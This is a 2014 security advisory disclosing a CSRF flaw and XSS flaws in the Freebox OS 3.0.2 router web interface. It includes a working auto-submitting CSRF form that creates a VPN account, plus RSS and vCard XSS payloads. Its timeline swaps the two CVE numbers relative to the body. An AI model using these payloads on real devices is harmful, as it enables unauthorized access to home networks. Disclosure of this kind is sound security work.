FreeBox 3.0.2 Cross Site Request Forgery / Cross Site Scripting

`Hello list,   
  
Here are two CVEs I reported to Freebox, a french ISP:  
- CVE-2014-9382 - CSRF in VPN user account creation  
- CVE-2014-9405 - XSS  
  
Vulnerable product: Freebox OS Web interface 3.0.2.  
  
CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation  
====================  
Risk level: High  
  
Freebox allows users to create VPN connections to their home network.   
  
In version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/:  
  
{"login":"foo","password_set":false,"ip_reservation":"","password":"bar"}  
  
This request is vulnerable to CSRF which is easy to trigger.  
  
The following POC would create a new VPN account "ngocdh" / "1234=5678":  
  
<html>  
<body onload=vpn.submit()>  
<form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain">  
<input type="hidden" name="{"login":"ngocdh","password_set":false,"ip_reservation":"","password":"1234" value="5678"}" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2  
====================  
Risk level: low  
  
Two XSS instances with low probability of exploitation were found in the following places:  
- Download RSS  
- Contacts  
  
The following POC demonstrates the XSS in the "description" field of a Download RSS item:  
  
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">  
<channel>  
<title>From Huy Ngoc</title>  
<description>[email protected]</description>  
<link>http://google.com</link>  
<atom:link rel="hub" href="http://google.com"/>  
<atom:link rel="self" href="http://google.com"/>  
<item>  
<title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>  
<pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>  
<guid>http://google.com></guid>  
</item>   
</channel>   
</rss>  
  
In order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed.  
  
  
The following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface:  
  
BEGIN:VCARD  
VERSION:3.0  
FN:DAU Huy Ngoc  
N:;;;;  
URL:<img src=/ onerror='alert(document.domain);'>  
END:VCARD  
  
In order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf.  
  
  
Timeline:  
21/11/2014: XSS CVE-2014-9382 is reported to vendor  
21/11/2014: vendor confirmed the vulnerability  
02/12/2014: CSRF CVE-2014-9405 is reported to vendor  
06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)  
  
Credit: DAU Huy Ngoc (@ngocdh)  
`